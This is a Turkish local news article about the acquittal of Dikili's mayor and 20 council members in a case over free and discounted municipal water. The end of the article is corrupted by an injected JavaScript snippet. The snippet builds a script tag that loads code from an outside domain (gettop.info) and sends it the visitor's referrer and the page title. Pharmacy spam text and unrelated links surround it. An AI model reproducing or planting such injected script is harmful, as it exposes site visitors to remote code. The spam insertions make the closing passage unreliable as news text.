Dikili Başkanı’na beraat

DİKİLİ – İzmir’in Dikili ilçesi belediye başkanı Osman Özgüven’in de aralarında bulunduğu 21 kişi hakkında, 10 tona kadar kullanılan sudan para alınmaması, belediye çalışanlarına yüzde 50 indirimli tarife uygulanması ve su borcu gecikme zamlarının affedilmesiyle ilgili davada tüm sanıklar beraat etti.
Dikili Asliye Ceza Mahkemesindeki duruşmaya, Belediye Başkanı Özgüven, eski Belediye Başkanı Yüksel Uçar, yeni ve eski 18 belediye meclisi üyesi katıldı. Eski meclis üyeleri, davalı Mehmet Akşengür ve Mustafa Ümmetoğlu ise duruşmaya gelmedi.
Cumhuriyet savcısının ”Kamu yararı için yapılan hiçbir çalışma suç sayılamaz, sanıkların beraatını talep ediyorum” demesi üzerine, mahkeme heyeti, Belediye Başkanı Özgüven’in de aralarında bulunduğu 21 kişi hakkında beraat kararı verdi.
Belediye Başkanı Özgüven, adliye çıkışında kendilerini bekleyen vatandaşlara hitaben yaptığı konuşmada, davanın ilk gününden itibaren suyun hak olduğunu, insanlara parayla satılmaması gerektiğini söylediklerini belirtti.
Belediyelerin ticari değil kamusal kurumlar olduğunu ifade eden Özgüven, şunları kaydetti:
”Dünyada insanların üretemediği tek şey su, toprak ve havadır. Suyu daha iyi değerlendireceğiz. Suyun erişilebilir bir hak olduğunu sonuna kadar savunacağız. Eğitim, ulaşım, yerleşim, ayrı ayrı insan hakkıdır. Bunları sonuna kadar savunmaya devam edeceğiz. Suyun kamusal bir hak olduğu ortaya çıktı. Bugün mahkeme, suyun insan hakkı olduğunu tescilledi.” Order var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Order online http://techem.business.bg/blog/?p=22793 Purchase Buy Pills

Benzer Yazılar:

  • Benzer yazı bulunamadı.

You must be logged in to post a comment Giris

Linkler

Reklamlar

Giriş - Powered by Pixelim Media · Ukrayna Turlari | Ozge Tur | Tesla ERP